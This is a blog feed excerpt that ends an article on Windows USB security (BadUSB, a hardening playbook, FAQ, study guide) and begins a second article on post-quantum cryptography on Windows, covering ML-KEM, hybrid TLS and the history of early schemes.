&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Vendor adoption&quot; sounds like a feature-request line item rather than an open research problem. It is structural. Until a host OS commits silicon-supply-chain weight to USB-IF Authentication, the standards body has no influence on the peripheral vendors; until the peripheral vendors ship Authentication-capable silicon, the host OS sees no installed base to support. Solving the two-sided-market problem is the open problem -- not the cryptography.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The shortest path to closing the descriptor-trust gap runs through silicon (USB-IF Authentication), not through Windows. Until then, every defense in this article is layered around the gap, not on top of it.&lt;/p&gt;
&lt;h2&gt;10. A 2026 USB-Security Playbook for Windows IT&lt;/h2&gt;
&lt;p&gt;We have done the structural accounting. The reader who got this far is either a Windows internals engineer who wants the exact stack picture or an IT operator who needs to deploy something on Monday. The next four sub-sections are for that operator.&lt;/p&gt;
&lt;h3&gt;For end users&lt;/h3&gt;
&lt;p&gt;Do not plug in cables you did not buy. Do not use public USB charging stations. Brian Krebs reported the original juice-jacking demonstration verbatim in August 2011: &lt;em&gt;&quot;In the three and a half days of this year&apos;s DefCon, at least 360 attendees plugged their smartphones into the charging kiosk built by the same guys who run the infamous Wall of Sheep ... Brian Markus, president of Aires Security, said he and fellow researchers Joseph Mlodzianowski and Robert Rowley built the charging kiosk to educate attendees about the potential perils of juicing up at random power stations&quot;&lt;/em&gt; [@krebs-juicejacking]. CISA&apos;s 2023 juice-jacking advisory and the FBI Denver Field Office&apos;s April 6, 2023 X.com warning trace their evidence base to the Aires Security demonstration and its lineage [@wiki-juicejacking]. If you must charge in public, use a USB data-blocker dongle (a passive accessory that breaks the data pins and passes only power).&lt;/p&gt;
&lt;h3&gt;For IT admins on Windows 11 Enterprise&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A minimal Windows 11 Enterprise USB-hardening baseline, in priority order: 1. &lt;strong&gt;Enable Kernel DMA Protection.&lt;/strong&gt; Verify &lt;code&gt;msinfo32&lt;/code&gt; shows &lt;em&gt;&quot;Kernel DMA Protection: On&quot;&lt;/em&gt;. On firmware where the toggle is off, work with the OEM to turn it on in BIOS. Documentation: [@ms-kdp]. 2. &lt;strong&gt;Enable the ASR USB rule.&lt;/strong&gt; Set GUID &lt;code&gt;b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4&lt;/code&gt; to Block via Intune or Group Policy. Verify with &lt;code&gt;(Get-MpPreference).AttackSurfaceReductionRules_Ids&lt;/code&gt;. Documentation: [@ms-asr-rules]. 3. &lt;strong&gt;Configure Defender for Endpoint Device Control.&lt;/strong&gt; Default-deny Mass Storage. Allow corporate HID by VID/PID/serial allow-list. Documentation: [@ms-devcontrol]. 4. &lt;strong&gt;Configure BitLocker To Go.&lt;/strong&gt; Group Policy: &lt;em&gt;Deny write access to removable drives not protected by BitLocker&lt;/em&gt;. Documentation: [@ms-bitlocker]. 5. &lt;strong&gt;Configure GPO Device Installation Restrictions.&lt;/strong&gt; Use &lt;code&gt;AllowedDeviceClasses&lt;/code&gt; with explicit USB / HID setup-class GUIDs to constrain which device classes can be installed in the first place. Documentation: [@ms-gpo-devinstall] [@ms-devsetupclasses]. 6. &lt;strong&gt;Audit USB device installation.&lt;/strong&gt; Pull Event ID 6416 (PnP device installed) into your SIEM. Compose a Defender XDR hunting query for rapid-keystroke bursts in the first 15 seconds after a USB attach as a BadUSB / FIN7-style HID-injection signature [@bleeping-fin7].&lt;/p&gt;
&lt;/blockquote&gt;

*Not capable* means one of three things: the platform lacks an IOMMU (Intel VT-d or AMD-Vi disabled in firmware), the UEFI is not publishing the DMAR / IVRS ACPI tables, or no DMA-Remapping-compatible driver is loaded for at least one externally exposed peripheral. First check `Intel VT-d` or `AMD IOMMU` in the BIOS setup screen and enable them. If they are already on, confirm in `msinfo32` that *DMA Protection: ACPI* is *On* (the firmware-tables check). If the firmware is on and KDP still says *Not capable*, the per-driver opt-in path is the gap: open Device Manager and look at the *Hardware ID* tab of each Thunderbolt or USB4 peripheral; a driver without the `DmaRemappingCompatible=1` directive in its INF will not be IOMMU-isolated and downgrades the system-wide posture. The Microsoft Learn reference walks through the per-driver opt-in [@ms-dmaremap].
&lt;h3&gt;For driver developers&lt;/h3&gt;
&lt;p&gt;Declare &lt;code&gt;DmaRemappingCompatible=1&lt;/code&gt; in your INF if your hardware tolerates IOMMU isolation; this is a one-line directive change with a system-wide security posture improvement [@ms-dmaremap]. Prefer the WDF USB Lower / Upper filter pattern over legacy WDM; the framework&apos;s lifecycle and PnP plumbing are correct by construction in ways that legacy WDM code is not [@ms-usb-3-0-stack]. Validate every descriptor byte in user-mode tooling before relying on &lt;code&gt;usbhub3.sys&lt;/code&gt; to do so; if your device cannot survive its own validator, the descriptor parser surface is wider than it needs to be. If you are writing a vendor-specific function driver, prefer &lt;code&gt;winusb.sys&lt;/code&gt; over a custom KMDF function driver where possible [@ms-winusb]; less kernel-mode code is unambiguously better.&lt;/p&gt;
&lt;h3&gt;For red team and blue team&lt;/h3&gt;
&lt;p&gt;The reproducible test devices are USB Rubber Ducky II + DuckyScript 3.0 [@hak5-shop-ducky] [@hak5-ducky-docs] and the O.MG Cable [@omg-cable]. For inspection, &lt;code&gt;usbview.exe&lt;/code&gt; from the Windows SDK reads live descriptor trees out of &lt;code&gt;usbhub3.sys&lt;/code&gt; and is the closest thing Windows has to a USB-side &lt;code&gt;lsusb -v&lt;/code&gt;. For trace evidence, the ETW providers &lt;code&gt;Microsoft-Windows-USB-USBHUB3&lt;/code&gt; and &lt;code&gt;Microsoft-Windows-USB-USBPORT&lt;/code&gt; (older stack) carry enumeration sequences with per-stage timing, documented end-to-end in Microsoft&apos;s USB Event Tracing for Windows reference [@ms-usb-etw]; wireshark + USBPcap reads the raw descriptor bytes if the kernel-side capture is permitted. For blue-team detection, the BadUSB signature is &lt;em&gt;&quot;first observed time-since-attach to first keystroke event is less than 200 ms&quot;&lt;/em&gt;; legitimate human-driven keyboards do not type at that rate.&lt;/p&gt;
&lt;p&gt;The playbook is layered defense. None of these controls closes the descriptor-trust gap; together they raise the cost enough that the BadUSB-class attacks the article opens with become attacker-uneconomical in a corporate context. The structural problem is still open.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;The reader has the model. These are the seven misconceptions the model corrects.&lt;/p&gt;

No. BitLocker To Go protects *the data on the stick* if you lose it. A reprogrammed thumb drive that re-enumerates as a HID keyboard is unaffected because BitLocker never sees it as a managed volume in the first place [@ms-bitlocker]. BitLocker is a confidentiality control for data at rest on a removable volume; the malicious-peripheral problem is a problem of *peripheral authentication*, which BitLocker is not in the threat model of.

No. KDP blocks pre-login DMA from PCIe-class peripherals tunneled over Thunderbolt 3, Thunderbolt 4, or USB4 [@ms-kdp]. A USB 2.0 thumb drive performs no DMA at all, so KDP is not in its defense chain. KDP is a defense against a different attack class than BadUSB. They are complementary, not substitutable.

No. Driver signing certifies that Microsoft (or a paid-up OEM signed under Microsoft&apos;s signing infrastructure) approved the driver *code* [@ms-kmcs] [@ms-drvsigning]. It does not certify the *descriptors* the driver consumes at runtime. The signed `hidclass.sys` will load happily and inject keystrokes for any HID-class device whose descriptor declares it to be a keyboard, including a reprogrammed thumb drive. KMCS is a defense of the kernel against malicious drivers, not a defense of the kernel against malicious peripherals presenting valid descriptors to honest drivers. The Aside in Section 5 walks this point in detail.

No, it closed one vector. The 2011 KB971029-equivalent rollout disabled `autorun.inf`-driven AutoPlay execution by default [@krebs-feb2011] [@wiki-autorun]. That vector was the load-bearing one for the Conficker era. It did not affect HID injection (which Hak5 had already commercialized in 2010), it did not affect descriptor-parser bugs (which Andy Davis named at Black Hat 2011 [@ncc-davis-2011]), and it did not affect the LNK-icon attack class (which the same Patch Tuesday addressed separately [@nvd-cve-2010-2568]). Each closed vector was a single-bug closure that left adjacent vectors intact.

Real. The cable is commercially available; the firmware is technically documented in the product&apos;s own materials [@omg-cable]; the same primitive (a USB cable with a WiFi-enabled implant) is now in the FBI&apos;s threat reporting on FIN7 mailed-USB campaigns [@bleeping-fin7]. On a stock Windows 11 25H2 endpoint, the O.MG Cable&apos;s HID-injection primitive works exactly as advertised unless explicit Microsoft Defender for Endpoint Device Control policy blocks the HID class for that VID/PID/serial [@ms-devcontrol]. It is not a movie trope.

Not yet, and not by itself. The USB-IF Authentication Specification Revision 1.0 ECN dates from January 7, 2019 [@usbif-auth-spec]. The standard defines ECDSA P-256 over SHA-256 with X.509 chains -- everyday cryptography. The structural problem is two-sided market adoption: no host operating system (Windows, macOS, Linux, ChromeOS) consumes the standard in-box in 2026, and no major device-certification tier requires it. Until that loop closes, the standard&apos;s existence is necessary but not sufficient.

Mostly, with significant cost. Disabling USB controllers at firmware time blocks every USB attack class because no descriptors are ever parsed. It also blocks every keyboard, every mouse, every security token, every licensed peripheral, every biometric reader, every printer that does not speak network protocols, and every legitimate file transfer onto and off of the endpoint. The cost is usually higher than the threat for general-purpose business endpoints, but the trade-off is a legitimate one for tightly scoped roles like air-gapped industrial-control workstations.
&lt;p&gt;Plugging in a USB device is the single most-trusted action a user routinely performs on a Windows machine. Windows has done forty years of work to walk that trust back -- bit by bit, single-bug closure by single-bug closure, generation by generation. Some of that work is silicon-level (Kernel DMA Protection over IOMMU). Some of it is kernel-level (Kernel-Mode Code Signing chained to a Microsoft-trusted root). Some of it is application-level (Attack Surface Reduction, Device Control, AutoRun disablement, BitLocker To Go). None of it -- not one of the ten generations the article walks -- has touched the descriptor-trust premise itself. A peripheral&apos;s self-declared identity is still its identity at enumeration time, in 2026 as in 1996.&lt;/p&gt;
&lt;p&gt;The next breakthrough on this stack will not come from Windows. It will come from USB-IF Authentication finally shipping in commodity peripheral silicon, and a host operating system committing to consume it in-box. That shipment has now been seven years away for seven years. When it arrives -- if it arrives -- the descriptor-trust gap closes, the BadUSB primitive becomes detectable in the bus enumeration handshake, and the eleven kernel-mode operations that begin at 10:42:17 each morning finally consult something the peripheral cannot fake. Until then, the gap is the gap, and the layered mitigations Windows ships are what stand between a Phison microcontroller and your domain administrator credentials.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;plug-and-trust-on-windows&quot; keyTerms={[
  { term: &quot;USB descriptor&quot;, definition: &quot;A small structured block of bytes a USB peripheral returns on request; the device descriptor names vendor ID, product ID, device class, and packet size. The host has no out-of-band channel to verify any of these fields.&quot; },
  { term: &quot;Vendor ID / Product ID (VID/PID)&quot;, definition: &quot;A pair of 16-bit numbers the USB-IF sells (VID) and the manufacturer assigns (PID). The pair forms Windows&apos;s most-specific USB hardware ID. The USB-IF charges $6,000/year for a VID.&quot; },
  { term: &quot;Hardware ID&quot;, definition: &quot;The most specific identifier the PnP manager uses to bind a driver to a USB device. Canonical form: USB\VID_xxxx&amp;amp;PID_xxxx&amp;amp;REV_xxxx, synthesized from the device descriptor.&quot; },
  { term: &quot;Compatible ID&quot;, definition: &quot;A class-based identifier the PnP manager falls back to when no hardware-ID-specific driver INF matches. Canonical form: USB\Class_xx&amp;amp;SubClass_xx&amp;amp;Prot_xx, synthesized from the interface descriptor.&quot; },
  { term: &quot;Composite USB device&quot;, definition: &quot;A physical USB peripheral that declares multiple independent interfaces. usbccgp.sys splits the device into per-interface PDOs; a class driver binds to each independently. This is the structural primitive that lets a thumb drive also present a HID keyboard.&quot; },
  { term: &quot;Kernel-Mode Code Signing (KMCS)&quot;, definition: &quot;Mandatory-since-Vista-x64 policy requiring every .sys file Windows loads into ring zero to carry a Microsoft-trusted signature using SHA-256. KMCS protects against malicious drivers loading; it does not authenticate the data those drivers consume.&quot; },
  { term: &quot;Kernel DMA Protection (KDP)&quot;, definition: &quot;Windows 10 1803+ defense that uses the platform IOMMU to confine externally-connected PCIe-class peripherals (Thunderbolt 3/4, USB4) to per-device translation domains. Pre-login DMA is blocked; per-driver opt-in via DmaRemappingCompatible=1 is required for post-login allow.&quot; },
  { term: &quot;IOMMU&quot;, definition: &quot;Input/Output Memory Management Unit; hardware between peripherals and main memory that translates DMA addresses through OS-controlled per-device page tables. Intel VT-d, AMD-Vi, ARM SMMU.&quot; },
  { term: &quot;HID class&quot;, definition: &quot;USB device class with bInterfaceClass=0x03, originally for keyboards/mice/joysticks. A device that declares HID is allowed to inject keyboard and pointer events into the active session. There is no protocol provision for the host to authenticate that the device is actually a keyboard.&quot; },
  { term: &quot;Attack Surface Reduction (ASR)&quot;, definition: &quot;Microsoft Defender for Endpoint policy framework of GUID-identified rules that block specific abusable behaviors. The USB rule (b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4) blocks untrusted and unsigned process execution from USB-mounted volumes.&quot; },
  { term: &quot;BadUSB&quot;, definition: &quot;The 2014 SR Labs disclosure (Nohl + Krißler + Lell, Black Hat USA) that USB peripheral firmware is field-reprogrammable, allowing a thumb drive to re-enumerate as a HID keyboard and inject keystrokes. Demonstrated to be unpatchable at the protocol level by Karsten Nohl.&quot; },
  { term: &quot;USB-IF Authentication 1.0&quot;, definition: &quot;January 2019 ECN to the USB specification defining cryptographic peripheral identity via ECDSA P-256, X.509 chains, and SHA-256. Exists as a published standard; no major host OS consumes it as of 2026.&quot; }
]} questions={[
  { q: &quot;In what order does Windows execute the eleven kernel-mode operations between physical insertion of a USB device and class-driver attachment?&quot;, a: &quot;Port-status-change interrupt; port reset; speed detection; default-address GET_DESCRIPTOR for the first 8 bytes; SET_ADDRESS; full 18-byte device descriptor fetch; configuration descriptor fetch; composite-device split if applicable; hardware-ID and compatible-ID synthesis; INF database rank-scored search and KMCS verification of the chosen driver; class-driver attachment.&quot; },
  { q: &quot;Why does Kernel-Mode Code Signing not stop a BadUSB attack?&quot;, a: &quot;KMCS verifies the cryptographic signature of the driver binary Windows loads. It does not verify the descriptors the driver consumes at runtime. The signed hidclass.sys loads correctly and injects keystrokes for any HID-class peripheral that declares itself a keyboard; the malicious peripheral never needed to be signed because it is not the loaded binary.&quot; },
  { q: &quot;Why is a thumb drive that re-enumerates as a HID keyboard a protocol-level attack, not a bug?&quot;, a: &quot;The USB specification, by design, lets a peripheral declare its own class via the bInterfaceClass field. The HID class definition allows any HID device to send input events to the active session. There is no out-of-band channel for the host to authenticate that the device is actually a keyboard. The attack is the contract working as written.&quot; },
  { q: &quot;What attack class does Kernel DMA Protection mitigate, and what does it NOT mitigate?&quot;, a: &quot;KDP mitigates DMA-based attacks from externally-connected PCIe-class peripherals tunneled over Thunderbolt 3/4 or USB4. It does NOT mitigate USB 2.0/3.x mass storage attacks, HID injection, descriptor parser bugs, or anything else that does not involve raw DMA. A USB 2.0 thumb drive performs no DMA at all.&quot; },
  { q: &quot;Why has USB-IF Authentication 1.0 not been adopted by any major host OS as of 2026?&quot;, a: &quot;The standard has existed since January 2019. The blocker is two-sided market adoption: peripheral vendors will not ship Authentication-capable silicon until host operating systems consume it, and host operating systems will not consume it until enough peripherals ship it. The cryptography (ECDSA P-256, X.509, SHA-256) is everyday code; the gap is institutional, not technical.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>usb</category><category>security</category><category>kernel</category><category>drivers</category><category>badusb</category><category>pnp</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Post-Quantum Cryptography on Windows: The Thirty-Year Migration That Just Arrived</title><link>https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/</link><guid isPermaLink="true">https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/</guid><description>How NIST FIPS 203/204/205 reaches the Windows platform via SymCrypt, CNG, Schannel, and .NET 10 -- the algorithm internals, the wire format, the migration timeline, and the honest accounting.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Post-quantum cryptography arrived on Windows in 2024-2026.** NIST finalised FIPS 203 (ML-KEM), FIPS 204 (ML-DSA), and FIPS 205 (SLH-DSA) on August 13, 2024 [@nist-fips-approved-news]. SymCrypt has shipped ML-KEM, ML-DSA, LMS, and composite-ML-KEM implementations across versions 103.5.0 through 103.11.0; CNG exposes them as `BCRYPT_MLKEM_ALG_HANDLE` and `BCRYPT_MLDSA_ALGORITHM`; Schannel can negotiate hybrid TLS 1.3 `X25519MLKEM768` (codepoint 0x11EC) on 24H2 behind Group Policy [@symcrypt-changelog, @cng-mlkem-examples, @draft-tls-ecdhe-mlkem]. The migration closes the harvest-now-decrypt-later channel for TLS-protected traffic, leaves the signed-binary persistence channel open, and is structurally constrained by the 4096-byte TPM 2.0 command buffer against which ML-DSA-87&apos;s 4595-byte signatures overflow [@fips-204-pdf, @wolfssl-wolftpm-v185].
&lt;h2&gt;1. The 1184-Byte Field&lt;/h2&gt;
&lt;p&gt;A Windows endpoint opens a connection to &lt;code&gt;cloudflare.com&lt;/code&gt;. In its ClientHello, alongside the 32-byte X25519 public value every TLS 1.3 handshake has carried since 2018, sits a new 1184-byte field whose contents look like uniform noise -- an ML-KEM-768 encapsulation key, the bytes by which Microsoft, Cloudflare, Google, Apple, and OpenSSH have chosen to close a future they cannot yet see [@draft-tls-ecdhe-mlkem, @cloudflare-pq-2024].&lt;/p&gt;
&lt;p&gt;Two adversaries are watching the handshake. The first has 2026 compute and cannot break either share. The second has a hypothetical 2040 fault-tolerant quantum computer, breaks the X25519 share trivially via Shor&apos;s algorithm, and walks away unable to recover the ML-KEM-768 session key. Why does the handshake hold against the second adversary, and what did it take to make that field 1184 bytes long?&lt;/p&gt;

A family of cryptographic algorithms whose security rests on mathematical problems for which no efficient quantum algorithm is known. PQC is a public-key replacement programme: it replaces RSA, Diffie-Hellman, and elliptic-curve discrete-log primitives that Shor&apos;s algorithm collapses in polynomial time on a fault-tolerant quantum computer. Symmetric primitives (AES, SHA-2/3) survive with parameter increases and are not the target of PQC standardisation.
&lt;p&gt;The wire format is concrete and currently shipping. The IETF draft &lt;code&gt;draft-ietf-tls-ecdhe-mlkem-04&lt;/code&gt; (published 8 February 2026) defines three hybrid Supported Groups codepoints in TLS 1.3: &lt;code&gt;X25519MLKEM768&lt;/code&gt; at 0x11EC, &lt;code&gt;SecP256r1MLKEM768&lt;/code&gt; at 0x11EB, and &lt;code&gt;SecP384r1MLKEM1024&lt;/code&gt; at 0x11ED [@draft-tls-ecdhe-mlkem, @iana-tls-parameters]. The ClientHello &lt;code&gt;key_share&lt;/code&gt; extension carries 32 bytes of X25519 public value followed by 1184 bytes of ML-KEM-768 encapsulation key. The ServerHello reply carries 32 bytes of X25519 public value followed by 1088 bytes of ML-KEM-768 ciphertext. Both endpoints derive an X25519 shared secret and an ML-KEM-768 shared secret, concatenate them, and feed both into TLS 1.3&apos;s HKDF-Extract per &lt;code&gt;draft-ietf-tls-hybrid-design-16&lt;/code&gt; [@draft-tls-hybrid]. An adversary who can break either component but not both still learns nothing.&lt;/p&gt;

A threat model in which an adversary records today&apos;s network traffic and stores it for years, decrypting it once a sufficiently capable quantum computer is available. The threat applies to any traffic whose secrecy must survive past the time-to-cryptographically-relevant-quantum-computer; it does not apply to signed-binary integrity, which is validated at load time. Hybrid TLS shifts the boundary from &quot;must trust X25519 forever&quot; to &quot;must trust either X25519 or ML-KEM-768 forever&quot; [@cloudflare-pq-2024, @mosca-2015].
&lt;p&gt;The first internet-scale deployment of the construction landed on October 3, 2022, when Cloudflare turned on hybrid post-quantum key agreement by default for every website and API on its edge [@cloudflare-pq-for-all].Cloudflare&apos;s blog post measured the bytes-on-the-wire cost of the deployment as roughly 1.1 KB per handshake added; by March 2024 nearly two percent of all TLS 1.3 connections to Cloudflare&apos;s edge negotiated post-quantum key agreement, with double-digit adoption forecast by year-end [@cloudflare-pq-2024]. The Cloudflare default-on date predated FIPS 203&apos;s August 2024 finalisation by almost two years, which is why early deployments speak of &quot;Kyber&quot; and &quot;X25519Kyber768Draft00&quot; rather than ML-KEM.&lt;/p&gt;
&lt;p&gt;Apple&apos;s iMessage PQ3 followed in February 2024, framed as &quot;Level 3&quot; -- post-quantum key establishment plus post-quantum ratcheting [@apple-imessage-pq3]. By May 2026, Microsoft, Google, OpenSSH, and Signal have all shipped or announced hybrid post-quantum key agreement; Section 7 catalogues the per-vendor deployments verbatim, anchored to each vendor&apos;s own release artifact [@cloudflare-pq-2024, @signal-pqxdh, @openssh-9-9].&lt;/p&gt;
&lt;p&gt;This article delivers two promises. The first is algorithm-level: by the end of Section 5 you will know ML-KEM, ML-DSA, and SLH-DSA well enough to reason about parameter-set choices, side-channel posture, and FIPS-mandated byte counts. The second is platform-level: by the end of Section 6 you will know which CNG identifier ships in which SymCrypt release, which Schannel toggle gates X25519MLKEM768 on 24H2, and which Windows surfaces (Schannel, AD CS, .NET 10, Azure Key Vault) carry PQC in May 2026 and which (IKEv2, SMB, RDP, &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker network unlock&lt;/a&gt;, Kerberos PKINIT, &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello attestation&lt;/a&gt;) do not.&lt;/p&gt;
&lt;p&gt;Every line of code, every parameter set, every byte of that 1184-byte field has a thirty-year story behind it. To understand what shipped, we start where it began -- with a 1994 paper that put a clock on every public-key cryptosystem then in production.&lt;/p&gt;
&lt;h2&gt;2. Historical Origins&lt;/h2&gt;
&lt;p&gt;Why is replacing public-key cryptography hard? Because in 1976, Whitfield Diffie and Martin Hellman defined the primitive that &lt;em&gt;everything since&lt;/em&gt; has imitated. Their &quot;New Directions in Cryptography&quot; paper, in &lt;em&gt;IEEE Transactions on Information Theory&lt;/em&gt; 22(6), introduced the asymmetric key-agreement model [@dh-1976]: two parties exchange public values, derive a shared secret, and never share the underlying private state. The shared secret was the discrete logarithm of a public element in a finite group. Every public-key construction that followed -- RSA (1977), the Diffie-Hellman variants, DSA (1991), ECDSA and the elliptic-curve variants (mid-1980s into the 1990s, with X25519 standardised in RFC 7748 in 2016) -- inherited one of two hard problems: integer factoring, or the discrete logarithm in some abelian group [@rfc-7748].&lt;/p&gt;
&lt;p&gt;Eighteen years later, Peter Shor at Bell Labs found a polynomial-time quantum algorithm for both [@shor-1996]. The arXiv preprint &lt;code&gt;quant-ph/9508027&lt;/code&gt; dates to August 1995; the journal version appeared as &quot;Polynomial-Time Algorithms for Prime Factorization and Discrete Logarithms on a Quantum Computer&quot; in &lt;em&gt;SIAM Journal on Computing&lt;/em&gt; 26(5) (1997) 1484-1509; DOI 10.1137/S0097539795293172. Shor&apos;s algorithm requires a fault-tolerant quantum computer with thousands of logical qubits -- the kind of machine that does not yet exist, and may never exist in some accounts. But if it does exist, RSA, DH, DSA, ECDSA, and ECDH all collapse simultaneously. Not weakened; &lt;em&gt;broken&lt;/em&gt;. Doubling key sizes does not help; the algorithm&apos;s runtime is polynomial in the key length.&lt;/p&gt;

A polynomial-time quantum algorithm, due to Peter Shor (1994-1996), that solves integer factoring and the discrete logarithm in arbitrary abelian groups [@shor-1996]. The algorithm reduces both problems to finding the period of a function via the Quantum Fourier Transform, which a fault-tolerant quantum computer can compute in time polynomial in the input size. RSA, finite-field Diffie-Hellman, DSA, and the elliptic-curve variants ECDH/ECDSA/X25519 are all structurally retired by Shor&apos;s algorithm; no parameter increase rescues them.
&lt;p&gt;Two years later, Lov Grover (also at Bell Labs) published the symmetric-key counterpart. Grover&apos;s algorithm searches an unstructured database of N items in O(sqrt(N)) quantum steps [@grover-1996]. Applied to AES-128, Grover reduces the effective key strength to roughly $2^{64}$ quantum-search steps -- comparable to a 64-bit symmetric key. Applied to AES-256, it leaves 128 bits of security. The asymmetric lane is fatal; the symmetric lane is a parameter bump. This is why the entire post-quantum programme is a &lt;em&gt;public-key&lt;/em&gt; replacement programme, not a symmetric one.The standard policy response to Grover is to double the symmetric key size. AES-256 retains 128 bits of post-quantum security; SHA-384 retains 192 bits of preimage resistance; SHA-512 retains 256 bits. CNSA 2.0 mandates AES-256 and SHA-384 specifically for this reason [@cnsa20-csa]. Grover-style speedups do not generalise to AEAD constructions in the same way the asymmetric collapse does; the cost of doubling is structural and easy to absorb, which is why no one tries to invent a &quot;post-quantum AES.&quot;&lt;/p&gt;
&lt;p&gt;If Shor and Grover are 1994-1996 results, why is replacing public-key cryptography not a 2040 problem? Michele Mosca&apos;s 2015 ePrint 2015/1075 named the deadline. Mosca&apos;s inequality is one line:&lt;/p&gt;
&lt;p&gt;$$X + Y &amp;gt; Z$$&lt;/p&gt;
&lt;p&gt;where X is the security shelf-life of the data (how long today&apos;s traffic must remain confidential), Y is the migration time (how long it takes to deploy quantum-safe systems), and Z is the time until a cryptographically relevant quantum computer arrives. If X + Y exceeds Z, the adversary harvesting traffic today wins regardless of when the quantum computer arrives [@mosca-2015].&lt;/p&gt;

The deadline relation $X + Y &amp;gt; Z$: if data-secrecy lifetime (X) plus migration time (Y) exceeds time-to-quantum-computer (Z), harvest-now-decrypt-later succeeds. Mosca&apos;s framing turned an open quantum-engineering timeline into an actionable IT-policy lever; if you cannot predict Z, you must minimise Y, which means starting migration now [@mosca-2015].

If the security shelf-life of your data plus the migration time to deploy quantum-safe systems exceeds the time-to-quantum-computer, the adversary harvesting traffic today wins. -- the X + Y &amp;gt; Z framing, Mosca (eprint 2015/1075).
&lt;p&gt;On September 7, 2022, the U.S. National Security Agency turned Mosca&apos;s inequality into national-security policy. The Commercial National Security Algorithm Suite 2.0 (CNSA 2.0) is the algorithm list the NSA requires for protecting U.S. National Security Systems [@nsa-cnsa-news, @cnsa20-csa]. The current revision (May 30, 2025) names ML-KEM-1024 for key establishment, ML-DSA-87 for general digital signatures, LMS and XMSS for firmware signing, AES-256 for symmetric encryption, and SHA-384 for hashing. The policy carries four dates that drive every U.S. vendor roadmap including Microsoft&apos;s: acquisition preference for PQC in new National Security Systems by January 1, 2027; legacy-algorithm phase-out beginning December 31, 2030; mandatory PQC adoption by December 31, 2031; and disallowance of RSA / ECDSA after 2035.&lt;/p&gt;
&lt;p&gt;Shor&apos;s algorithm requires a fault-tolerant quantum computer that does not yet exist. So why isn&apos;t the migration easy? Because cryptographers tried to replace the asymmetric primitive for thirty years before this paper -- and every early attempt failed in a different way.&lt;/p&gt;
&lt;h2&gt;3. Early Approaches and Their Failures&lt;/h2&gt;
&lt;p&gt;Three rejected family trees and one almost-survivor explain why ML-KEM looks the way it does in 2026. Each was tried; each failed in a specific way; the failure shaped what survived.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;McEliece (1978)&lt;/strong&gt; is the oldest post-quantum proposal still under active study. Robert McEliece&apos;s construction uses the hardness of decoding a general linear code -- specifically, a binary Goppa code disguised by random permutations and a scrambling matrix [@mceliece-1978]. The cryptosystem has survived forty-eight years of cryptanalysis with no structural break; its security argument is one of the most conservative in cryptography. The cost is the public key. Classic McEliece at NIST security category 1 has public keys of roughly 261 kilobytes; at category 5, about 1 megabyte [@mceliece-project]. That size makes it unusable in TLS, where the entire ClientHello must fit in one or two IP packets. Classic McEliece survives as a Round-4 NIST candidate; it was &lt;em&gt;not&lt;/em&gt; selected for FIPS standardisation because of the key-size constraint, but is widely cited as the conservative fallback for long-term archival key wrapping.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HFE and multivariate cryptography (1996)&lt;/strong&gt; form the most thoroughly broken family. Jacques Patarin&apos;s Hidden Field Equations (HFE) hide the structure of a univariate polynomial over a small extension field by composing with random linear transformations on each side. Kipnis and Shamir broke the original HFE construction in 1999 [@kipnis-shamir-1999]. The descendant scheme Rainbow advanced through three NIST rounds before Ward Beullens published &quot;Breaking Rainbow Takes a Weekend on a Laptop&quot; in eprint 2022/214 on 25 February 2022, recovering Rainbow&apos;s secret key in 53 hours on a commodity laptop [@beullens-rainbow-2022].53 hours on a commodity laptop is the visceral data point. Rainbow had been a NIST third-round signature finalist; one paper, one weekend of CPU time, retired it. Beullens&apos; result is now the canonical example in PQC pedagogy of how a cryptographic finalist can be retired by an algorithmic insight that nobody noticed during seven years of NIST evaluation. The multivariate signature lane is effectively closed in 2026, with the partial exception of small specialised constructions (UOV-style schemes) that NIST is considering in the additional-signatures onramp [@nist-pqc-dig-sig].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NTRU (1996)&lt;/strong&gt; is the founding lattice cryptosystem. Jeffrey Hoffstein, Jill Pipher, and Joseph Silverman presented &quot;NTRU: A ring-based public key cryptosystem&quot; at ANTS-III in 1998 [@ntru-1996]. The construction works in a polynomial ring $R = \mathbb{Z}[X]/(X^n - 1)$ and offers public keys of roughly 1-2 kilobytes -- the first lattice cryptosystem with sizes competitive with RSA. NTRU was patent-encumbered for two decades (US Patents 6,081,597 and 6,144,740 expired in August and November 2017) [@ntru-patents], which kept it out of standards work for the formative years. Falcon, the NIST-selected lattice signature scheme that became FIPS 206 draft, inherits the NTRU lattice structure directly.&lt;/p&gt;
